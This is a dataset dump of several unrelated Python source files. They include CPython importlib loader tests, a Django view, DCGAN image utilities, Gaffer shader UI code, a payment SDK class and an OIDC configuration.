content
stringlengths 5
1.05M
|
|---|
""" imcascade: Fitting astronomical images using a 'cascade' of Gaussians """
__version__ = "1.0"
from .fitter import Fitter
from .results import ImcascadeResults
|
from thepeer_sdk.exceptions import ThepeerSDKException
class Links():
def __init__(self) -> None:
if hasattr(self, "api_client"):
self.api_client = self.api_client
else:
raise ThepeerSDKException("api_client instance is required")
if hasattr(self, "API_BASE_URL"):
self.API_BASE_URL = self.api_client
else:
raise ThepeerSDKException("API_BASE_URL is required")
def get_user_links(self, user_ref: str) -> dict:
"""
This returns all linked accounts associated with a user.
:params user_ref: str
the reference returned when the user was indexed
"""
if not user_ref or user_ref.strip() == "":
raise ThepeerSDKException(
"`user_ref` cannot be an empty string")
return self.api_client.make_get(
url=f'{self.API_BASE_URL}/users/{user_ref}/links',
)
def get_link(self, link_id: str) -> dict:
"""
Get a linked account details
:params link_id: str
link ID
"""
if not link_id or link_id.strip() == "":
raise ThepeerSDKException(
"`link_id` cannot be an empty string")
return self.api_client.make_get(
url=f'{self.API_BASE_URL}/link/{link_id}',
)
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: graph_fruit
# Description: draw same fruit with different cities (Draw line graph of 10 cities on the same fruit picture)
# Author: Kuan-Hui Lin
# Date: 2020/5/12
# -------------------------------------------------------------------------------
from collections import defaultdict
from directory import create_directory
import matplotlib.pyplot as plt
def plot_fixed_fruit(path, month, price):
city = ['ATLANTA','BALTIMORE','BOSTON','CHICAGO','COLUMBIA',
'DETROIT','LOS ANGELES','MIAMI','NEW YORK','PHILADELPHIA']
colours=['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple',
'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan']
create_directory(path)
# fruit fix
fruit_dic = defaultdict(list)
for j in range(len(price)):
if (j+1)%5 == 1:
fruit_dic['BLUEBERRIES'].append(price[j])
elif (j+1)%5 == 2:
fruit_dic['GUAVA'].append(price[j])
elif (j+1)%5 == 3:
fruit_dic['LIMES'].append(price[j])
elif (j+1)%5 == 4:
fruit_dic['ORANGES'].append(price[j])
elif (j+1)%5 == 0:
fruit_dic['STRAWBERRIES'].append(price[j])
# plot Line Graph
leg_list = list()
plt.figure(figsize = (11,10))
for key in fruit_dic.keys(): #key is fruit name
leg_list = list()
for f in range(len(fruit_dic[key])):
leg_list.append((str(key),city[f]))
plt.plot(month, fruit_dic[key][f], c=colours[f%10], label='High', alpha=0.5, linewidth = 2.0, linestyle = '-', marker='o')
if (f+1)%10 == 0:
plt.legend(leg_list, loc='best')
plt.title("Fruit Fixed and City Changed")
plt.xlabel("Month")
plt.ylabel("Mean Price for each type")
plt.savefig(path +'/'+ key +'.png')
plt.close()
plt.figure(figsize = (11,10))
|
# -*- coding: utf-8 -*-
import unittest
import stocks
# make sure all the required librarires can be imported
import pandas.io.data
import pyquery
import email.mime.multipart
import email.mime.text
import numpy
import pystache
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_absolute_truth_and_meaning(self):
assert True
if __name__ == '__main__':
unittest.main()
|
from importlib import machinery
import importlib
import importlib.abc
from .. import abc
from .. import util
from . import util as source_util
import errno
import imp
import marshal
import os
import py_compile
import shutil
import stat
import sys
import unittest
from test.support import make_legacy_pyc
class SimpleTest(unittest.TestCase):
"""Should have no issue importing a source module [basic]. And if there is
a syntax error, it should raise a SyntaxError [syntax error].
"""
def test_load_module_API(self):
# If fullname is not specified that assume self.name is desired.
class TesterMixin(importlib.abc.Loader):
def load_module(self, fullname): return fullname
def module_repr(self, module): return '<module>'
class Tester(importlib.abc.FileLoader, TesterMixin):
def get_code(self, _): pass
def get_source(self, _): pass
def is_package(self, _): pass
name = 'mod_name'
loader = Tester(name, 'some_path')
self.assertEqual(name, loader.load_module())
self.assertEqual(name, loader.load_module(None))
self.assertEqual(name, loader.load_module(name))
with self.assertRaises(ImportError):
loader.load_module(loader.name + 'XXX')
def test_get_filename_API(self):
# If fullname is not set then assume self.path is desired.
class Tester(importlib.abc.FileLoader):
def get_code(self, _): pass
def get_source(self, _): pass
def is_package(self, _): pass
def module_repr(self, _): pass
path = 'some_path'
name = 'some_name'
loader = Tester(name, path)
self.assertEqual(path, loader.get_filename(name))
self.assertEqual(path, loader.get_filename())
self.assertEqual(path, loader.get_filename(None))
with self.assertRaises(ImportError):
loader.get_filename(name + 'XXX')
# [basic]
def test_module(self):
with source_util.create_modules('_temp') as mapping:
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
module = loader.load_module('_temp')
self.assertIn('_temp', sys.modules)
check = {'__name__': '_temp', '__file__': mapping['_temp'],
'__package__': ''}
for attr, value in check.items():
self.assertEqual(getattr(module, attr), value)
def test_package(self):
with source_util.create_modules('_pkg.__init__') as mapping:
loader = machinery.SourceFileLoader('_pkg',
mapping['_pkg.__init__'])
module = loader.load_module('_pkg')
self.assertIn('_pkg', sys.modules)
check = {'__name__': '_pkg', '__file__': mapping['_pkg.__init__'],
'__path__': [os.path.dirname(mapping['_pkg.__init__'])],
'__package__': '_pkg'}
for attr, value in check.items():
self.assertEqual(getattr(module, attr), value)
def test_lacking_parent(self):
with source_util.create_modules('_pkg.__init__', '_pkg.mod')as mapping:
loader = machinery.SourceFileLoader('_pkg.mod',
mapping['_pkg.mod'])
module = loader.load_module('_pkg.mod')
self.assertIn('_pkg.mod', sys.modules)
check = {'__name__': '_pkg.mod', '__file__': mapping['_pkg.mod'],
'__package__': '_pkg'}
for attr, value in check.items():
self.assertEqual(getattr(module, attr), value)
def fake_mtime(self, fxn):
"""Fake mtime to always be higher than expected."""
return lambda name: fxn(name) + 1
def test_module_reuse(self):
with source_util.create_modules('_temp') as mapping:
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
module = loader.load_module('_temp')
module_id = id(module)
module_dict_id = id(module.__dict__)
with open(mapping['_temp'], 'w') as file:
file.write("testing_var = 42\n")
module = loader.load_module('_temp')
self.assertIn('testing_var', module.__dict__,
"'testing_var' not in "
"{0}".format(list(module.__dict__.keys())))
self.assertEqual(module, sys.modules['_temp'])
self.assertEqual(id(module), module_id)
self.assertEqual(id(module.__dict__), module_dict_id)
def test_state_after_failure(self):
# A failed reload should leave the original module intact.
attributes = ('__file__', '__path__', '__package__')
value = '<test>'
name = '_temp'
with source_util.create_modules(name) as mapping:
orig_module = imp.new_module(name)
for attr in attributes:
setattr(orig_module, attr, value)
with open(mapping[name], 'w') as file:
file.write('+++ bad syntax +++')
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
with self.assertRaises(SyntaxError):
loader.load_module(name)
for attr in attributes:
self.assertEqual(getattr(orig_module, attr), value)
# [syntax error]
def test_bad_syntax(self):
with source_util.create_modules('_temp') as mapping:
with open(mapping['_temp'], 'w') as file:
file.write('=')
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
with self.assertRaises(SyntaxError):
loader.load_module('_temp')
self.assertNotIn('_temp', sys.modules)
def test_file_from_empty_string_dir(self):
# Loading a module found from an empty string entry on sys.path should
# not only work, but keep all attributes relative.
file_path = '_temp.py'
with open(file_path, 'w') as file:
file.write("# test file for importlib")
try:
with util.uncache('_temp'):
loader = machinery.SourceFileLoader('_temp', file_path)
mod = loader.load_module('_temp')
self.assertEqual(file_path, mod.__file__)
self.assertEqual(imp.cache_from_source(file_path),
mod.__cached__)
finally:
os.unlink(file_path)
pycache = os.path.dirname(imp.cache_from_source(file_path))
if os.path.exists(pycache):
shutil.rmtree(pycache)
def test_timestamp_overflow(self):
# When a modification timestamp is larger than 2**32, it should be
# truncated rather than raise an OverflowError.
with source_util.create_modules('_temp') as mapping:
source = mapping['_temp']
compiled = imp.cache_from_source(source)
with open(source, 'w') as f:
f.write("x = 5")
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno != getattr(errno, 'EOVERFLOW', None):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
mod = loader.load_module('_temp')
# Sanity checks.
self.assertEqual(mod.__cached__, compiled)
self.assertEqual(mod.x, 5)
# The pyc file was created.
os.stat(compiled)
class BadBytecodeTest(unittest.TestCase):
def import_(self, file, module_name):
loader = self.loader(module_name, file)
module = loader.load_module(module_name)
self.assertIn(module_name, sys.modules)
def manipulate_bytecode(self, name, mapping, manipulator, *,
del_source=False):
"""Manipulate the bytecode of a module by passing it into a callable
that returns what to use as the new bytecode."""
try:
del sys.modules['_temp']
except KeyError:
pass
py_compile.compile(mapping[name])
if not del_source:
bytecode_path = imp.cache_from_source(mapping[name])
else:
os.unlink(mapping[name])
bytecode_path = make_legacy_pyc(mapping[name])
if manipulator:
with open(bytecode_path, 'rb') as file:
bc = file.read()
new_bc = manipulator(bc)
with open(bytecode_path, 'wb') as file:
if new_bc is not None:
file.write(new_bc)
return bytecode_path
def _test_empty_file(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: b'',
del_source=del_source)
test('_temp', mapping, bc_path)
@source_util.writes_bytecode_files
def _test_partial_magic(self, test, *, del_source=False):
# When their are less than 4 bytes to a .pyc, regenerate it if
# possible, else raise ImportError.
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:3],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_magic_only(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:4],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_partial_timestamp(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:7],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_partial_size(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:11],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_no_marshal(self, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:12],
del_source=del_source)
file_path = mapping['_temp'] if not del_source else bc_path
with self.assertRaises(EOFError):
self.import_(file_path, '_temp')
def _test_non_code_marshal(self, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bytecode_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:12] + marshal.dumps(b'abcd'),
del_source=del_source)
file_path = mapping['_temp'] if not del_source else bytecode_path
with self.assertRaises(ImportError) as cm:
self.import_(file_path, '_temp')
self.assertEqual(cm.exception.name, '_temp')
self.assertEqual(cm.exception.path, bytecode_path)
def _test_bad_marshal(self, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bytecode_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:12] + b'<test>',
del_source=del_source)
file_path = mapping['_temp'] if not del_source else bytecode_path
with self.assertRaises(EOFError):
self.import_(file_path, '_temp')
def _test_bad_magic(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: b'\x00\x00\x00\x00' + bc[4:])
test('_temp', mapping, bc_path)
class SourceLoaderBadBytecodeTest(BadBytecodeTest):
loader = machinery.SourceFileLoader
@source_util.writes_bytecode_files
def test_empty_file(self):
# When a .pyc is empty, regenerate it if possible, else raise
# ImportError.
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_empty_file(test)
def test_partial_magic(self):
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_partial_magic(test)
@source_util.writes_bytecode_files
def test_magic_only(self):
# When there is only the magic number, regenerate the .pyc if possible,
# else raise EOFError.
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_magic_only(test)
@source_util.writes_bytecode_files
def test_bad_magic(self):
# When the magic number is different, the bytecode should be
# regenerated.
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as bytecode_file:
self.assertEqual(bytecode_file.read(4), imp.get_magic())
self._test_bad_magic(test)
@source_util.writes_bytecode_files
def test_partial_timestamp(self):
# When the timestamp is partial, regenerate the .pyc, else
# raise EOFError.
def test(name, mapping, bc_path):
self.import_(mapping[name], name)
with open(bc_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_partial_timestamp(test)
@source_util.writes_bytecode_files
def test_partial_size(self):
# When the size is partial, regenerate the .pyc, else
# raise EOFError.
def test(name, mapping, bc_path):
self.import_(mapping[name], name)
with open(bc_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_partial_size(test)
@source_util.writes_bytecode_files
def test_no_marshal(self):
# When there is only the magic number and timestamp, raise EOFError.
self._test_no_marshal()
@source_util.writes_bytecode_files
def test_non_code_marshal(self):
self._test_non_code_marshal()
# XXX ImportError when sourceless
# [bad marshal]
@source_util.writes_bytecode_files
def test_bad_marshal(self):
# Bad marshal data should raise a ValueError.
self._test_bad_marshal()
# [bad timestamp]
@source_util.writes_bytecode_files
def test_old_timestamp(self):
# When the timestamp is older than the source, bytecode should be
# regenerated.
zeros = b'\x00\x00\x00\x00'
with source_util.create_modules('_temp') as mapping:
py_compile.compile(mapping['_temp'])
bytecode_path = imp.cache_from_source(mapping['_temp'])
with open(bytecode_path, 'r+b') as bytecode_file:
bytecode_file.seek(4)
bytecode_file.write(zeros)
self.import_(mapping['_temp'], '_temp')
source_mtime = os.path.getmtime(mapping['_temp'])
source_timestamp = importlib._w_long(source_mtime)
with open(bytecode_path, 'rb') as bytecode_file:
bytecode_file.seek(4)
self.assertEqual(bytecode_file.read(4), source_timestamp)
# [bytecode read-only]
@source_util.writes_bytecode_files
def test_read_only_bytecode(self):
# When bytecode is read-only but should be rewritten, fail silently.
with source_util.create_modules('_temp') as mapping:
# Create bytecode that will need to be re-created.
py_compile.compile(mapping['_temp'])
bytecode_path = imp.cache_from_source(mapping['_temp'])
with open(bytecode_path, 'r+b') as bytecode_file:
bytecode_file.seek(0)
bytecode_file.write(b'\x00\x00\x00\x00')
# Make the bytecode read-only.
os.chmod(bytecode_path,
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
try:
# Should not raise IOError!
self.import_(mapping['_temp'], '_temp')
finally:
# Make writable for eventual clean-up.
os.chmod(bytecode_path, stat.S_IWUSR)
class SourcelessLoaderBadBytecodeTest(BadBytecodeTest):
loader = machinery.SourcelessFileLoader
def test_empty_file(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(ImportError) as cm:
self.import_(bytecode_path, name)
self.assertEqual(cm.exception.name, name)
self.assertEqual(cm.exception.path, bytecode_path)
self._test_empty_file(test, del_source=True)
def test_partial_magic(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(ImportError) as cm:
self.import_(bytecode_path, name)
self.assertEqual(cm.exception.name, name)
self.assertEqual(cm.exception.path, bytecode_path)
self._test_partial_magic(test, del_source=True)
def test_magic_only(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(EOFError):
self.import_(bytecode_path, name)
self._test_magic_only(test, del_source=True)
def test_bad_magic(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(ImportError) as cm:
self.import_(bytecode_path, name)
self.assertEqual(cm.exception.name, name)
self.assertEqual(cm.exception.path, bytecode_path)
self._test_bad_magic(test, del_source=True)
def test_partial_timestamp(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(EOFError):
self.import_(bytecode_path, name)
self._test_partial_timestamp(test, del_source=True)
def test_partial_size(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(EOFError):
self.import_(bytecode_path, name)
self._test_partial_size(test, del_source=True)
def test_no_marshal(self):
self._test_no_marshal(del_source=True)
def test_non_code_marshal(self):
self._test_non_code_marshal(del_source=True)
def test_main():
from test.support import run_unittest
run_unittest(SimpleTest,
SourceLoaderBadBytecodeTest,
SourcelessLoaderBadBytecodeTest
)
if __name__ == '__main__':
test_main()
|
#https://www.acmicpc.net/problem/10828
#스택
import sys
class Stack:
def __init__(self):
self.stack = []
def push(self, num):
self.stack.append(num)
def pop(self):
if not self.empty():
return self.stack.pop()
else:
return -1
def size(self):
return len(self.stack)
def empty(self):
if self.size() == 0:
return 1
else:
return 0
def top(self):
if not self.empty():
return self.stack[-1]
else:
return -1
n = int(sys.stdin.readline().strip())
s = []
for i in range(n):
code = sys.stdin.readline().strip()
if code == 'pop':
if len(s)==0:
print(-1)
else:
print(s.pop())
if code.startswith('push'):
_, num = code.split()
s.append(int(num))
if code == 'top':
if len(s)==0:
print(-1)
else:
print(s[-1])
if code == 'empty':
if len(s)==0:
print(1)
else:
print(0)
if code == 'size':
print(len(s))
|
import grequests
import logging
from django.shortcuts import render
from django.views.decorators.cache import cache_control
from django.views.decorators.http import require_safe
from core.api.resources import Profile
from core.api.resources import response_list_to_dict
from core.api.resources import Site
from core.api.resources import Trending
from core.api.exceptions import APIException
from core.views import respond_with_error
from core.views import build_pagination_links
logger = logging.getLogger('trending.views')
list_template = 'trending.html'
@require_safe
def list(request):
url, params, headers = Trending.build_request(request.get_host(), access_token=request.access_token)
request.view_requests.append(grequests.get(url, params=params, headers=headers))
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
trending = Trending.from_api_response(responses[url])
view_data = {
'user': Profile(responses[request.whoami_url], summary=False) if request.whoami_url else None,
'site': Site(responses[request.site_url]),
'content': trending,
'pagination': build_pagination_links(responses[url]['items']['links'], trending.items),
'site_section': 'trending'
}
return render(request, list_template, view_data)
|
"""
Some codes from https://github.com/Newmu/dcgan_code
"""
from __future__ import division
import math
import tarfile
import zlib
import io
from PIL import Image
import random
import pprint
import scipy.misc
import numpy as np
from tools.rotation_utils import *
import tensorflow as tf
import tensorflow.contrib.slim as slim
import glob
import os
import random
import scipy.misc
pp = pprint.PrettyPrinter()
get_stddev = lambda x, k_h, k_w: 1/math.sqrt(k_w*k_h*x.get_shape()[-1])
def show_all_variables():
model_vars = tf.trainable_variables()
slim.model_analyzer.analyze_vars(model_vars, print_info=True)
def get_image(image_path, input_height, input_width,
resize_height=64, resize_width=64,
crop=True):
image = load_webp(image_path)
return transform(image, input_height, input_width,
resize_height, resize_width, crop)
def get_image_jitter(image_path, input_height, input_width,
resize_height=64, resize_width=64, ratio=1.0,
crop=True):
image = load_webp(image_path)
return transform_jitter(image, input_height, input_width,
resize_height, resize_width, ratio, crop)
def get_image_random_crop(image_path, resize_height=64, resize_width=64):
image = load_webp(image_path)
return transform_random_crop(image, resize_height, resize_width)
def save_images(images, size, image_path):
return imsave(inverse_transform(images), size, image_path)
def load_webp(img_path):
im = Image.open(img_path)
return np.asarray(im)
def merge(images, size):
h, w = images.shape[1], images.shape[2]
if (images.shape[3] in (3,4)):
c = images.shape[3]
img = np.zeros((h * size[0], w * size[1], c))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j * h:j * h + h, i * w:i * w + w, :] = image
return img
elif images.shape[3]==1:
img = np.zeros((h * size[0], w * size[1]))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j * h:j * h + h, i * w:i * w + w] = image[:,:,0]
return img
else:
raise ValueError('in merge(images,size) images parameter '
'must have dimensions: HxW or HxWx3 or HxWx4')
def crop_square(im):
h = im.shape[0]
w = im.shape[1]
crop_size = min(h, w)
if h > w: #If image is vertical
#Crop using center
crop_size = min(h,w)
mid_point = h // 2
jitter = random.randint(0, (h- crop_size) // 2)
mid_point += jitter #Move away from center crop to give some diversity
try:
cropped = im[(mid_point - crop_size // 2) : (mid_point + crop_size //2), :, :] #Crop using midpoint
# cropped = im[top_left:top_left+crop_size, :, :] #Crop using top left point
except:
return None
elif h == w: #If image is square
cropped = im
else: #If image is horizontal
top_left = random.randint(0, w - crop_size)
try:
cropped = im[:, top_left:top_left+crop_size, :]
except:
return None
return cropped
def center_crop(x, crop_h, crop_w,
resize_h=64, resize_w=64):
print(x.shape)
h, w = x.shape[:2]
min_dim = np.min([h, w])
if min_dim < crop_h:
print("MIN DIM {0}".format(min_dim))
crop_h = min_dim
print(crop_h)
if h == w:
print("EQUAL")
return scipy.misc.imresize(x, [resize_h, resize_w])
if crop_w is None:
crop_w = crop_h
j = int(round((h - crop_h)/2.))
i = int(round((w - crop_w)/2.))
return scipy.misc.imresize(
x[j:j+crop_h, i:i+crop_w], [resize_h, resize_w])
def center_crop_jitter(x, crop_h, crop_w=None,
resize_h=64, resize_w=64, ratio=1.0):
print("Center crop jitter")
h, w = x.shape[:2]
min_dim = np.min([h, w])
if min_dim < crop_h:
crop_w = min_dim
if h == w:
return scipy.misc.imresize(x, [resize_h, resize_w])
if h < w: #Only consider horizontal images
mid_point = w // 2
diff = w-min_dim
rand = random.randint(0, int(ratio * diff // 2))
if random.random() >= 0.5:
mid_point += rand
else:
mid_point -= rand
return scipy.misc.imresize(
x[:, mid_point-crop_w//2:mid_point+crop_w//2], [resize_h, resize_w])
if h > w:
# Crop using center
crop_size = min(h, w)
mid_point = h // 2
cropped = x[(mid_point - crop_size // 2): (mid_point + crop_size // 2), :, :] # Crop using midpoint
return scipy.misc.imresize(cropped, [resize_h, resize_w])
def random_crop(x,
resize_h=64, resize_w=64):
cropped = crop_square(x)
return scipy.misc.imresize(
cropped, [resize_h, resize_w])
def transform(image, input_height, input_width,
resize_height=64, resize_width=64, crop=True):
if crop:
cropped_image = center_crop(
image, input_height, input_width,
resize_height, resize_width)
else:
cropped_image = scipy.misc.imresize(image, [resize_height, resize_width])
if len(cropped_image.shape) != 3: #In case of binary mask with no channels:
cropped_image = np.expand_dims(cropped_image, -1)
return np.array(cropped_image)[:, :, :3]/127.5 - 1.
def transform_jitter(image, input_height, input_width,
resize_height=64, resize_width=64, ratio=1.0, crop=True):
if crop:
cropped_image = center_crop_jitter(
image, input_height, input_width,
resize_height, resize_width, ratio)
else:
cropped_image = scipy.misc.imresize(image, [resize_height, resize_width])
if len(cropped_image.shape) != 3: #In case of binary mask with no channels:
cropped_image = np.expand_dims(cropped_image, -1)
return np.array(cropped_image)[:, :, :3]/127.5 - 1.
def transform_random_crop(image, resize_height=64, resize_width=64):
cropped_image = crop_square(image)
cropped_image = scipy.misc.imresize(cropped_image, [resize_height, resize_width])
if len(cropped_image.shape) != 3: #In case of binary mask with no channels:
cropped_image = np.expand_dims(cropped_image, -1)
return np.array(cropped_image)[:, :, :3]/127.5 - 1.
def inverse_transform(images):
return (images+1.)/2.
def image_manifold_size(num_images):
manifold_h = int(np.floor(np.sqrt(num_images)))
manifold_w = int(np.ceil(np.sqrt(num_images)))
assert manifold_h * manifold_w == num_images
return manifold_h, manifold_w
def to_bool(value):
"""
Converts 'something' to boolean. Raises exception for invalid formats
Possible True values: 1, True, "1", "TRue", "yes", "y", "t"
Possible False values: 0, False, None, [], {}, "", "0", "faLse", "no", "n", "f", 0.0, ...
"""
if str(value).lower() == "true": return True
if str(value).lower() == "false": return False
raise Exception('Invalid value for boolean conversion: ' + str(value))
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferScene
##########################################################################
# Metadata
##########################################################################
GafferUI.Metadata.registerNodeDescription(
GafferScene.Shader,
"""The base type for all nodes which create shaders. Use the ShaderAssignment node to assign them to objects in the scene.""",
"name",
{
"description" :
"""The name of the shader being represented. This should be considered read-only. Use the Shader.loadShader() method to load a shader.""",
"nodeUI:section" : "header",
},
"parameters",
"""Where the parameters for the shader are represented.""",
)
##########################################################################
# PlugValueWidgets
##########################################################################
class __ShaderNamePlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, **kw ) :
row = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 )
GafferUI.PlugValueWidget.__init__( self, row, plug, **kw )
with row :
self.__label = GafferUI.Label( "" )
GafferUI.Spacer( IECore.V2i( 1 ), expand=True )
self.__button = GafferUI.Button( "Reload" )
self.__buttonClickedConnection = self.__button.clickedSignal().connect( Gaffer.WeakMethod( self.__buttonClicked ) )
self._updateFromPlug()
def hasLabel( self ) :
return True
def _updateFromPlug( self ) :
with self.getContext() :
shaderName = self.getPlug().getValue()
self.__label.setText( "<h3>Shader : " + shaderName + "</h3>" )
## \todo Disable the RenderMan check once we've got all the shader types implementing reloading properly.
self.__button.setEnabled( shaderName and "RenderMan" in self.getPlug().node().typeName() )
def __buttonClicked( self, button ) :
node = self.getPlug().node()
node.shaderLoader().clear()
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
node.loadShader( node["name"].getValue(), keepExistingValues = True )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "name", __ShaderNamePlugValueWidget )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "parameters", GafferUI.CompoundPlugValueWidget, collapsed=None )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "out", None )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "type", None )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "enabled", None )
##########################################################################
# NodeGadgets and Nodules
##########################################################################
def __nodeGadgetCreator( node ) :
return GafferUI.StandardNodeGadget( node, GafferUI.LinearContainer.Orientation.Y )
GafferUI.NodeGadget.registerNodeGadget( GafferScene.Shader.staticTypeId(), __nodeGadgetCreator )
def __parametersNoduleCreator( plug ) :
return GafferUI.CompoundNodule( plug, GafferUI.LinearContainer.Orientation.Y, spacing = 0.2 )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "parameters", __parametersNoduleCreator )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "name", lambda plug : None )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "type", lambda plug : None )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "enabled", lambda plug : None )
# we leave it to the derived class uis to register creators for the parameters.* plugs, because only the derived classes know whether
# or not networkability makes sense in each case.
##########################################################################
# NodeFinderDialogue mode
##########################################################################
def __shaderNameExtractor( node ) :
if isinstance( node, GafferScene.Shader ) :
return node["name"].getValue()
else :
return ""
GafferUI.NodeFinderDialogue.registerMode( "Shader Names", __shaderNameExtractor )
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 CESNET.
#
# CESNET-OpenID-Remote is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""CESNET OIDC Auth backend for OARepo"""
import os
from datetime import timedelta
from cesnet_openid_remote import CesnetOpenIdRemote
from cesnet_openid_remote.constants import OPENIDC_GROUPS_SCOPE, OPENIDC_BASE_URL
CESNET_OPENIDC_CONFIG = dict(
base_url=OPENIDC_BASE_URL,
consumer_key=os.environ.get('OPENIDC_KEY', 'MISSING_OIDC_KEY'),
consumer_secret=os.environ.get('OPENIDC_SECRET', 'MISSING_OIDC_SECRET'),
scope=f'openid email profile {OPENIDC_GROUPS_SCOPE} isCesnetEligibleLastSeen'
)
CESNET_OPENID_REMOTE_REFRESH_TIMEDELTA = timedelta(minutes=-1)
"""Default interval for refreshing user's extra data (e.g. groups)."""
CESNET_OPENID_REMOTE_GROUP_REALM = 'cesnet.cz'
"""Default realm of group attribute URNs."""
CESNET_OPENID_REMOTE_GROUP_AUTHORITY = 'perun.cesnet.cz'
"""Default authority that issues the group attribute URIs."""
CESNET_OPENID_REMOTE_SESSION_KEY = 'identity.cesnet_provides'
"""Name of session key where CESNET roles are stored."""
OAUTHCLIENT_CESNET_OPENID_GROUP_VALIDATOR = 'cesnet_openid_remote.groups.validate_group_uri'
"""Function used to validate external group URIs."""
OAUTHCLIENT_CESNET_OPENID_GROUP_PARSER = 'cesnet_openid_remote.groups.parse_group_uri'
